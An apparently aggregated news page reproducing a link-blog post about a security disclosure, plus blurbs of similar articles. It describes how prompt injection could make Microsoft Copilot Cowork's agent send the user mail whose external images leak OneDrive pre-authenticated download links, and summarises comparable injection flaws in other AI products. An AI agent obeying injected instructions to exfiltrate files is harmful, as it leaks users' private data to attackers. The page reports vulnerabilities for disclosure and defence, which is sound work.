Microsoft Copilot Cowork Exfiltrates Files

Simon Willison's Blog News
security vulnerability prompt-injection microsoft-copilot data-exfiltration llm-security agent-systems

Summary

A security vulnerability in Microsoft Copilot Cowork allows attackers to exfiltrate files by exploiting prompt injection that triggers external image requests, potentially leaking pre-authenticated download links.

No content available
Original Article
View Cached Full Text

Cached at: 05/26/26, 06:46 PM

# Microsoft Copilot Cowork Exfiltrates Files Source: [https://simonwillison.net/2026/May/26/copilot-cowork-exfiltrates-files/](https://simonwillison.net/2026/May/26/copilot-cowork-exfiltrates-files/) 26th May 2026 \- Link Blog **[Microsoft Copilot Cowork Exfiltrates Files](https://www.promptarmor.com/resources/microsoft-copilot-cowork-exfiltrates-files)**\([via](https://news.ycombinator.com/item?id=48272354)\) The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data\. In this case Microsoft Copilot Cowork \(yes, that's[a real product name](https://www.microsoft.com/en-us/microsoft-365/blog/2026/03/09/copilot-cowork-a-new-way-of-getting-work-done/)\) was allowing agents to send emails to the user's own inbox without approval\.\.\. but those messages were then displayed in a way that could leak data to an attacker via rendered images: > Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent\. Since OneDrive can create pre\-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker\.

Similar Articles

Microsoft Copilot Cowork Exfiltrates Files

Hacker News Top

Researchers at PromptArmor demonstrate that Microsoft Copilot Cowork can be exploited via indirect prompt injection to exfiltrate files from Microsoft 365, exploiting the lack of approval for certain actions when the recipient is the active user.

Anthropic Claude Code Leak Reveals Critical Command Injection Vulnerabilities

Lobsters Hottest

Critical command injection vulnerabilities (CVE-2026-35022, CVSS 9.8) discovered in Anthropic's Claude Code CLI and SDK allow attackers to execute arbitrary commands and steal credentials through environment variables, file paths, and authentication helpers. The flaws enable poisoned pipeline execution attacks in CI/CD environments, requiring immediate patching and configuration changes.

ChatGPT for Google Sheets Exfiltrates Workbooks

Hacker News Top

A security researcher discloses that OpenAI's ChatGPT extension for Google Sheets is vulnerable to indirect prompt injection attacks, allowing attackers to exfiltrate workbooks and execute unauthorized actions despite user settings requiring approval.